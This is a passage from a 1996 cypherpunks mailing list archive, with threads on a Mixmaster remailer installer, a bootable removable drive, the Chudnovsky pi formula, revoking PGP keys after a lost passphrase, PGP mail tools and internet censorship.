Message-ID: <199601060155.UAA13574@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 05, 1996 19:06:21, 'Adam Shostack <adam@lighthouse.homeport.org>'
wrote: 
 
 
>	Towords the goal of making Mixmasters in a box, I've written 
>an installer script for mixmaster.  If you're running on one of the 
>supported platforms (alpha, bsdi, hpux, linux, sunos, solaris), the 
>script will walk you through everything from the make to setting up 
>cron jobs & /etc/aliases. 
> 
>	If you've been putting off setting up a remailer because its a 
>pain, give this a shot.  Lance will probably be including it in the 
>next release of mixmaster, but you can get it now by sending me a 
>message with the Subject: get mix-installer. 
> 
>	Comments, bugs, bug fixes are welcome.  Thanks to Rich $alz 
>for a extensive comments & suggestions for portability. 
> 
>Adam 
> 
 
I've reports that the latest version of SyQuest's external parallel port
EZ135 "floppy" drive is due on the shelves this month. Also reported is the
ability to effectively boot off the thing, and thus run whatever OS resides
on the SyQuest "floppy" rather than an OS that has to be on the host's hard
drive partition. 
 
Weight, under two pounds. Price ~$US250. Capacity 135 Mb formatted. Price
of spare disks: $US 20. 
Take it off a computer. Put it in a briefcase. Carry it with you nicely out
of public view. Hook it up to another machine and .... 
 
Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk and
have enough useful space left over for a useful amount of data? 
 
Question 2: Anybody want to speculate on what traffic analysis is like when
encrypted data comes INTO one known Mixmaster site but goes OUT on one or
more "unknown" or (partially) random Mixmaster sites? 
 
Question 3: Anyone want to speculate on what data recovery is like when
encrypted data and the horse it rode in (and out) on has all been
physically destroyed at a replacement cost of only $US20? 
 
-- 
     -- tallpaul 
      
     -- "If they think you're crude, go technical; if they think you're
technical, go crude." 
                           William Gibson 
                           "Johnny Mnemonic" 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 6 Jan 1996 13:52:36 +0800
To: cypherpunks@toad.com
Subject: Re: Pi Stuff
In-Reply-To: <m0tYMQF-0008ykC@pacifier.com>
Message-ID: <199601060513.VAA12559@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

 > While I'm not an expert at this, I think you're
 > misrepresented the Chudnovsky result.  They formulated an
 > equation that allowed "you" to continue the calculation
 > past "N" digits as long as you had the result that far.

That property would be possessed by any self-correcting iteration
which converged in a neighborhood of Pi.  It would not be
necessary to repeat ones earlier calculations at increased
precision in order to determine Pi to additional digits.  One
could just use the previous calculations as a starting point and
continue to iterate, doing the new calculations to extended
precision.

I believe the Chudnovskys proved a much stronger result than
this, although precisely what it was escapes me at the moment.

[Please hum the theme to "Final Jeopardy" while I look up
 Chudnovsky's formula]

Good - it's in the sci.math FAQ.

Set k_1 = 545140134
    k_2 = 13591409
    k_3 = 640320
    k_4 = 100100025
    k_5 = 327843840
    k_6 = 53360;

Then pi = (k_6 sqrt(k_3))/(S), where

S = sum_(n = 0)^oo (-1)^n ((6n)!(k_2 +nk_1))/(n!^3(3n)!(8k_4k_5)^n)

This converges linearly at about 14 digits a term, and carries
forward a sufficiently small amount of state that one can iterate
into the billions of digits without the CPU requirements becoming
painful.  So it basically functions as a digit generator for Pi,
which, when appropriately initialized, will work on any part of
the number and emit the appropriate output.  The denominator
simplifies in a special way which keeps the computation localized
to a small neighborhood of the place where the new digits are
appearing.

 > As far as I know, they DID NOT generate any formula for the
 > generation of isolated digits of pi, the more recent news.

I guess you're right about it not having the specific form of a
function which takes "i" as input and emits the "ith" bit.
Nonetheless, the discovery of this particular formula and the
way in which its computational requirements expand tastefully
with increasing numbers of digits hints strongly at the existence
of the aforementioned closed solution.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 6 Jan 1996 11:05:58 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: get mix-installer. (fwd)
In-Reply-To: <199601060223.UAA04181@einstein.ssz.com>
Message-ID: <199601060232.VAA09545@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Choate writes:
> I followed the request information per the original posting by Adam and 
> received this in reply.
> 
> This leads me to believe that Mr. Shostack is basicaly unwilling to fulfill
> his own promises. My advice, avoid like the plague.
> 
> Caviat emptor.

Chill the fuck out (this obscenity brought to you by the U.S. Congress).

Adam has already posted an earlier version of the script to the Mixmaster
mailing list. It's not vaporware. 

Besides, Adam has been around and contributing for quite a while. Smearing
his rather excellent c'punk reputation because of (probably) a malfunctioning
procmail recipe isn't terribly productive, or neighborly. 

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO3fBinaAKQPVHDZAQE3PQf/WbzMM67+nvUKyHzoeuFzk0/OCL/CxAFR
3BClrig/4CYZvEGLbaqZbhzjsQQ04Wgl39T4nntclU9TZpbvyvRPnat+rZuEl0xK
cefKyfMCGvU1Ia92MdXzTYZYM5/7DHjVKo+rMBbKHiolrEKsTTsP7oo4Cgju25OQ
ekPCqTyPeY+mO8e3pQd29h/oFJMte8hi8k9AJ88AhpEKlORETNx/mRYz17PtSHwF
yUg82YbYY1YLGKXRnUON+FIgmSQo9VeFK1VQouvmX+7JA5BDwdrbz731ZZd4nvpj
/JXK0zG5x2rkJgDmrNK4/HKEhnkS6lR/4NubojXFdJmv6UA+Cw++dQ==
=1xgH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 6 Jan 1996 11:14:24 +0800
To: aleph1@dfw.dfw.net (Aleph One)
Subject: Re: Crypto Rules Report
In-Reply-To: <Pine.SUN.3.91.960105202950.16391A-100000@dfw.dfw.net>
Message-ID: <199601060259.VAA27843@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


(John and Aleph, strike my last message)

A copy of the report John mentioned is now on

	http://www.cs.umass.edu/~lmccarth/cypherpunks/icl.txt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 5 Jan 1996 19:30:14 +0800
To: mianigand@unique.outlook.net (Michael C. Peponis)
Subject: Re: What to do about Germany
In-Reply-To: <199601031913.NAA11851@unique.outlook.net>
Message-ID: <199601051104.WAA20347@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "Michael C. Peponis" <mianigand@unique.outlook.net>
  and cypherpunks@toad.com
 
M.C.P. wrote:
...[in reply to someone Re: Compu$erve vs Germany]...
> But that's a GERMAN law, the Internet is an INTERNATIONAL community.  
> If we have to respect the laws of Germany, and their customs and 
> archaic belief systems, them we have to give the same consideration 
> to anyother countries backwords, morality-based, mentality.  There 
...

What if the laws actually contradict each other?

Eg if there was a country that forbade women speaking on the net, and
another that forbade distinctions between men and women to be made?

(Sorry about the example, ladies, but it's one that comes to mind...)

I guess at that stage one or the other of the countries will cut itself
off the net.


BTW, in the January 96 *Australian Personal Computer*, an opinion
column draws a comparison between the attitude to the Internet and
the (ancient) obligation for a motor car to be preceeded by someone
carrying a red flag... Not such a bad metaphor, I thought.

...
> But when you go to a sexualy 
> explicit newsgroup, what do you think you will find, what is the 
...

Prayers?
 

Adiau - Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMO0FsSxV6mvvBgf5AQGArgP9ERnp79miefBoDlaVrVSFILG7nsFAh3l3
54S54voFHhBUowAYXET8ZaNbN+ZxNcAJYjft+pELIXo2iCQtexYKdfY2fEPDh8Vu
L2UcWMuV/WOBJ4U75YiHHUcZUE4rdqeeyW9A5NIqTv84NYzOAF28LI921I4Nq2/T
E8o5m8AaIvQ=
=6GVd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Sat, 6 Jan 1996 23:23:14 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve grovels to foreign censors
Message-ID: <2.2.32.19960106033904.00352520@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 1/5/96 -0500, you wrote:
>At 12:56 AM 1/5/96 -0500, Larry Sudduth wrote:
>
>>Attachment Converted: C:\WORK\WINMAIL.DAT
>
>What, pray tell, is this?

   If a MSMail for Windows user attaches a file to her message, it also
sends along the icon for the ride.  This file could also be a picture that
someone pasted in to their message.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 7 Jan 1996 10:01:03 +0800
To: cypherpunks@toad.com
Subject: Re: \"Concryption\"
Message-ID: <199601061852.KAA00797@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:13 PM 1/4/96 -0800, Bill Frantz wrote:
> What I interpreted their press release as saying was that they had patented
> the idea of doing the compression AND the encryption in one pass over the
> data.  If they got a patent for this, then the patent office has totally
> lost the concept that in order to be patentable, the idea must not be
> obvious to those well versed in the state of the art.

All bureaucracies act in to extend their power, regardless of the laws
and the official purpose of the bureacracy.  We will soon have a patent
on bicycles.



>
>
>-----------------------------------------------------------------
>Bill Frantz                   Periwinkle  --  Computer Consulting
>(408)356-8506                 16345 Englewood Ave.
>frantz@netcom.com             Los Gatos, CA 95032, USA
>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Sat, 6 Jan 1996 12:12:29 +0800
To: cypherpunks@toad.com
Subject: WIRE TAP ON NET
Message-ID: <2.2.16.19960106040018.259fb770@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain



E-MAIL-TAP NETS CRIMINALS
The first-ever court-approved wiretap of an e-mail account has resulted in
the arrest of three people charged with running a sophisticated
cellular-fraud ring.  The alleged mastermind, a German electrical engineer,
advertised his illicit wares on CompuServe, where they caught the attention
of an engineer at AT&T's wireless unit.  The Secret Service and the Drug
Enforcement Agency then got into the act and obtained the Justice Dept.'s
permission to intercept e-mail messages between the alleged perpetrator and
his accomplices.  "This case represents the challenges in the future if we
can't get ahead of the curve in technology," says a U.S. attorney, whose
office is prosecuting the case.  (Wall Street Journal 2 Jan 96 p16)
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Sat, 6 Jan 1996 23:25:56 +0800
To: cypherpunks@toad.com
Subject: Revoking Old Lost Keys
Message-ID: <2.2.32.19960106070719.00694cc8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'd like to bring up a problem I haven't seen addressed much yet, and which
I think is going to come up with increasing frequency as PGP use spreads.

The problem is this: how can one spread the word that an old key is no
longer to be used when one no longer has the pass phrase, and cannot
therefore create a revocation certificate?

In my case the problem is medical: thanks to autoimmune problems, I get
random memory loss from time to time. Sometimes it's big - like an entire
semester of my sophomore year of college. Sometimes it's small - like three
old pass phrases. So there are keys of mine floating around the key servers
that I don't want used, and which are just taking up space.

Others will have more mundane problems, like creating a key years ago and
just plain not using it. But as PGP use moves out of essentially pure-geek
communities into the surrounded net.world, accidents and other carelessness
_will_ happen. I'm curious as to what thoughts, if any, y'all have about how
to deal with it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMO4fZH3AXR8sjiylAQHOqwfPbvjHnfM7WlbjjUrrmYQ6Diba2aJb0g2K
KjsgTAZ3hyUGcnSBRsMPAb+GTkf440SRvX3JxBsRKn0X0lzHvM6ejKducQPrlJyM
ter8C8kiwhZXLcNQiAVpOthrarO7qYqs9JBXmEIm2JwAXtO2SwhB8KsUxvHJpf5R
v2036MQb2DSpz1VwmPw6yJYSCy5WrvyT/bRCgJ1Tukx2N0AJ3+tEBeXO9BhpwkjZ
oGQPa1XtvcgUGsR1a+HKytz9RrBcgh8voXOBz3LmP1EZH0YEG0VA0a2ej/JUkwza
et55dxK8LuuwOz6qo/9QJ2kyGqo641nRLowCdjXI29wITQ==
=Asuu
-----END PGP SIGNATURE-----

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 6 Jan 1996 21:11:38 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy?
In-Reply-To: <199601060155.UAA13574@pipe3.nyc.pipeline.com>
Message-ID: <Pine.LNX.3.91.960105224938.541A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 5 Jan 1996, tallpaul wrote:

> I've reports that the latest version of SyQuest's external parallel port
> EZ135 "floppy" drive is due on the shelves this month. Also reported is the
> ability to effectively boot off the thing, and thus run whatever OS resides
> on the SyQuest "floppy" rather than an OS that has to be on the host's hard
> drive partition. 
>  
> Weight, under two pounds. Price ~$US250. Capacity 135 Mb formatted. Price
> of spare disks: $US 20. 
> Take it off a computer. Put it in a briefcase. Carry it with you nicely out
> of public view. Hook it up to another machine and .... 
>  
> Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk and
> have enough useful space left over for a useful amount of data? 
>  

I have PGP, mixmaster, and several other crypto programs as well as X,
Netscape, the entire Linux kernel, and several other huge programs and files
that I never even use on my Linux system, and all of that takes up ~137 Mb.
A base Linux system takes up between 10 and 80 Mb, so Linux would fit quite
nicely on one of these disks.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO3zeLZc+sv5siulAQFW9AP/c9Bq1jzpb7pL7eTdhngLGJ9OOmDzWJ8u
CMI+dJkvhpPCOTfFf22RAO/LE/9x2wxYedmLMPniZfMQ3UIph1esibz8VbN8+IAI
IABbeU3pKVdOQEDG5w6QafBNvaiXlSx6EvFyaRf3n0y1pSriV3u1dBeB9If+TVHG
MOb3ftp56F0=
=e+Ey
-----END PGP SIGNATURE-----


--
finger -l markm@voicenet.com for PGP key  http://www.voicenet.com/~markm/
Fingerprint: bd24d08e3cbb53472054fa56002258d5  Key-ID: 0xF9B22BA5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 6 Jan 1996 16:32:40 +0800
To: cypherpunks@toad.com
Subject: Pi Code.......
Message-ID: <199601060817.AAA07878@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In case anyone wants to play with the little program that 
emits bits of Pi, a Fortran version is available on the Web
at...

http://www.cecm.sfu.ca/~pborwein/PISTUFF/FORTRAN

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Jan 1996 16:06:07 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <ad1366a50002100426f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:07 AM 1/6/96, Bruce Baugh wrote:

>I'd like to bring up a problem I haven't seen addressed much yet, and which
>I think is going to come up with increasing frequency as PGP use spreads.
>
>The problem is this: how can one spread the word that an old key is no
>longer to be used when one no longer has the pass phrase, and cannot
>therefore create a revocation certificate?

Basically, you are screwed. Any revocation you attempt will not be trusted,
as we will suspect the new "you" to be an attacker, perhaps an agent of the
NSA or the Illuminati. In the view that "you are your key," the old you no
longer exists.

Perhaps you could just move to a different city, change your name, and
create a new key. (However, be sure you write down your passphrase and
other salient information to handle your next memory loss.)

>
>In my case the problem is medical: thanks to autoimmune problems, I get
>random memory loss from time to time. Sometimes it's big - like an entire
>semester of my sophomore year of college. Sometimes it's small - like three
>old pass phrases. So there are keys of mine floating around the key servers
>that I don't want used, and which are just taking up space.

Pardon me for being politically incorrect (*), but anyone who has these
sorts of memory lapses should certainly write down the passphrases! While
it is true that writing down a passphrase increases the risk slightly that
a black bag operative will sneak into one's house and use his Minox to
record the passphrases, in practice this is a minor risk. Especially
compared to the immediate risk of losing or forgetting the passphrase.

(* I said I was being "politically incorrect" because I've found that
people these days don't want their defects and weaknesses commented upon by
others, even when they mention them themselves. Thus, cripples don't want
anyone to comment on their handicaps, and so on. Someone on this list with
"Multiple Personality Disorder" got mightily offended when someone else
mentioned MPD in a joking way in a post. Others freak out at innocent
remarks, seeing their own demons.)

So, if you are losing entire semesters worth of memory, you might want to
start writing a lot of stuff down.

Seriously, this is an example where "escrow" works. Seal an envelope with
your passphrase and any other stuff you want to remember, and leave it with
your lawyer or escrow agency with instructions to only turn it over to you.
Same as a safe deposit box, unless you forget the key. (You could forget
you have a lawyer, so better write that down somewhere, too.)

I've not forgotten my PGP passphrase, but then I've only had one PGP key in
the last several years and I've written a note to myself someplace which
describes what the passphrase is in terms I think would only be meaningful
to me. Not fully secure, but nothing really is. And secure enough.

If you've had several keys in several years, and yet you are risk of
forgetting entire semesters, maybe you ought to think about whether
encryption is all that necessary for you. (I rarely see the need to
encrypt, even as I cherish the ability and present right to encrypt, so I
naturally wonder what it is all these people who seem to be encrypting
nearly every private message they send are really concerned about....just
my opinion.)

I hope all turns out well, and I hope my candid answers to your questions
are not too politically incorrect.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 17:32:59 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <2.2.32.19960106092022.009408f0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:10 AM 1/6/96 +0000, Michael C. Peponis wrote:

>On  5 Jan 96 , Bruce Baugh wrote:

>Another problem, let's say I get your public key from Bob, who signed 
>your key, and Bob knows you have revoked your key, but I don't, so 
>what happens to my copy of your key? 
>
>Since there is no revokation certificate, I am forced to take Bob's 
>word that you have indeed want to revoke your key, but have no way of 
>verifying that without talking to you, and agin I have to go through 
>the same verification process that Bob did.

I know Bruce and his problem is quite real.  I happened to have the three keys
that he is wanting to revoke in my keyring.  (And one of them he had forgotten
he had made at all.)  It would be nice if there was a way to use the "web of
trust" to certify a key revokation in the same way that one signs a key.
Basically get a couple of your friends who are accepted in the crypto community
and have them vouch for the actual loss of the key(s).  It would certainly help
patch the problem.  (It might open up things for spoofing anyways.  There would
have to be a way of overriding such a thing with the real key, but that would
require the passphrase.  (Which should be available if not lost.)) An idea at
least...



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO495OQCP3v30CeZAQHObQf/VtMoPzpBqx9wU2rsrHkMc5K4LF2PbZdj
QboPyoR0c56zIGPiDDoRed4aiy8ylBlPjEGdSeLjoVysbY+yfWz1GDzsrmsdNw9G
tAE7DxX88kk9ym4ixy+3CIsFqKrHn1CBh64DAsoJzXRLgwEhPENLmqf0VXgRkYnI
Dd7UE3fF15sMEEVdGYXBqEy7r3e83R9dW7ap/z8wy/sM5U8pzo0SwRrqEFVNe2/g
8rYDF8uFgDjbCrU60UVqFq3ipRbGDBGMI9xSLqpSkBHuSOk0si3sNqvSM09WuWFE
LjkrVWPvZNaw1DbuQT7v2FTXNrNnfBsVH9MicM2fednOV0Fe7ZIoZg==
=sT8b
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 17:44:35 +0800
To: Ng Pheng Siong <ngps@cbn.com.sg>
Subject: Re: Windows Eudora and PGP
Message-ID: <2.2.32.19960106093243.00968ed0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:04 PM 1/5/96 +0800, Ng Pheng Siong wrote:
>On Fri, 5 Jan 1996, David K. Merriman wrote:
>> I've gotten ahold of the WPGP mentioned here a couple days ago, and it seems
>> to be working just fine, for me. Even easier to use than PIdaho, though not
>> quite as 'full-featured' (ie, remailer support, etc).
>
>Aegis, which was mentioned on this list some months ago, is the best
>of the lot, IMHO. No remailer support: You can talk to a remailer from 
>an email program. ;)

I use Aegis right now and I have only one major problem with it.  It does
not have a facility to do word wraps in the program before signing.  This
means that if you use it with Eudora and word wrap is on, all of your sigs
are going to be bad.  (And hitting return on every line before feeding it
through is a pain in the ass.)

On the other hand, I have heard that WPGP is not very stable under Win95.
Can't win for losing...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Jan 1996 16:28:10 +0800
To: cypherpunks@toad.com
Subject: "Microsoft.com" added to my KILL file
Message-ID: <ad136dd101021004d693@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



After getting another batch of bounce messages from Microsoft's Postmaster,
I have reluctantly decided to filter out all messages from Microsoft.com
until they fix this problem with Microsoft Exchange.

Their latest message was:

*****

Your message did not reach some or all of the intended recipients.

      To:       cypherpunks@toad.com
      Subject:  Foiling Traffic Analysis
      Sent:     01/05/96 08:51:18

The following recipient(s) could not be reached:

      Ron Murray on 01/05/96 08:51:18
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

*****

Rather than fight their misconfigured mail system, or try to convince them
to change their ways so as to conform to accepted practices, I'll just use
technology.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 18:29:01 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: RE: Revoking Old Lost Keys
Message-ID: <2.2.32.19960106101559.00919d9c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 AM 1/6/96 -0000, Frank O'Dwyer wrote:
>On Saturday, January 06, 1996 09:18, Timothy C. May[SMTP:tcmay@got.net] wrote:
>>At 7:07 AM 1/6/96, Bruce Baugh wrote:
>>>I'd like to bring up a problem I haven't seen addressed much yet, and which
>>>I think is going to come up with increasing frequency as PGP use spreads.
>>>
>>>The problem is this: how can one spread the word that an old key is no
>>>longer to be used when one no longer has the pass phrase, and cannot
>>>therefore create a revocation certificate?
>>
>>Basically, you are screwed. Any revocation you attempt will not be trusted,
>>as we will suspect the new "you" to be an attacker, perhaps an agent of the
>>NSA or the Illuminati. In the view that "you are your key," the old you no
>>longer exists.
>
>This is true, but the "old you" can be resurrected if you can get enough 
>people to believe your new key using any out-of-band means available
>to you.  You can also put a comment in your new key's uid explaining the
>problem and how to verify the new key. You will find it very hard to use this 
>new key for a while, though, during the transition period. Many people will
take 
>the existence of two keys with the same uid as suspicious in itself, since
it at 
>least indicates some kind of attack (even if only a denial of service
attack).  
There are times when you want multiple keys with the same ID.  I have two
key sizes becuase one is an older key.  I keep it around for use with people
who are using versions that do not support the larger keys.  (I have run
into this once from a sometimes user of PGP.  He finally upgraded.)  To
aleviate the suspicion, I have the two keys sign each other.

>This is really a usability flaw with current PGP.

Only if you use the name to refer to the key and not the hex ID.  (I found
out the hard way that some front ends use either the last key created or
whatever they feel like for signing keys and/or signing messages.  I am
still trying to straighten out some of the weird results of that.)
Fortunatly, some programs will use the hex ID to refer to the key so there
is no confusion.

>The PGP formats do allow for a 'revocation' certificate, but PGP doesn't
>implement it (yet, I guess).  In any case, it's not really strong enough, 
>since what it says is "I retract all my previous statements that this key is 
>related to this user".  This'd mean that you'd have to visit everyone who'd
ever 
>signed your key and get them to issue this retraction. What would be needed 
>for this problem is either an "anti-certificate" ("This key does not belong
to this 
>user"), or else some convention. For example, if two _trusted_ keys are
found for the 
>same uid, the most recent one could be chosen, and the earlier one be purged 
>from keyservers, etc.  This may be possible with current PGP.  I haven't
tried it, 
>but since I have some keys which have fallen into disuse, I will need to do so 
>sometime.).

Revocations are supported, but they require the passphrase.  (I have a
number of revokations on my keyring from various folks.)  The problem here
is occasions where you have forgotten the passphrase.  (I have an old
keyring that I need to go and revoke all of the old keys on it.  I have not
used them in a year or two.  I doubt if they are even on the keyserver...)
Eventually there will be a way of revoking keys in the circumstance.
Something similar to a notary (or a combination of notaries) who can vouch
and say "hey, this guy really did lose his keys".

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 18:43:21 +0800
To: cypherpunks@toad.com
Subject: A couple of ideas for PGP-based programs
Message-ID: <2.2.32.19960106103250.00947438@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am posting these ideas here before I annoy the people who will probibly
implement them just to see if they have much merit...  (If this is incoherent
it is because of the late night posting, but I want to get it done while the
thoughts are still there...)  Maybe some of this will occur after PGP 3.0 is
released.  (That is, if the universe has not cooled down into a small lump of
coal before then...)

1) Something I would like to see on the keyservers for PGP is a way of 
retreving all of the key revokations since x date without having to get all of
the keys since that date.  I hate having to check each key every so often to 
see if it is revoked.  It would make it alot easier to avoid using compromised
or old unused keys.

2)  I would like to see a program like private Idaho have the ability to send
mail to the key server and grab all of the "unknown signator" keys.  This would
have the interesting effect of building a more complete keyring, while using 
the "web of trust" to weed out alot of the bogus keys that tend to crop up on
the key servers.  After n number of itenerations you would have more of the
"important keys" and the ones that have little or no signage would be left to
grab when needed.  This would avoid the need to grab the entire key database.
(In fact, it would make it desirable NOT to...)

More later when I am not so tired...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO5PTOQCP3v30CeZAQET8wf/WI8o18pAol3HcN8j+EZyM7aIkPRFg/EQ
IYU+J8c5UrXrHDyUY+lZI11Ip2CgXfL/9ER6+vJ/xKPRfNOYnzOe+53FIOKbhJ0U
VPGCJYi7tbIpqBB+SHJe555fijEeGAORMvGqCVosb+KKsZQvQP5SHGK3zsy9rBP+
ojkM3AyJs5uyia4pAjV1Zz3DfxEgMPvBPtqXObN32FVbAq7hGmscDKNHEJ7ifO7H
xQiMWyzPJgWdUttdoi9ko7kFYLzze4472hEGNV9DbFZMlpVn6Eex9Hhz/wq20j4i
mgfyjU3GF+6+OY8KgkXU79FYKkZYqa019uCuPk50cgRdUZsI1BLyHA==
=ImCD
-----END PGP SIGNATURE-----

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
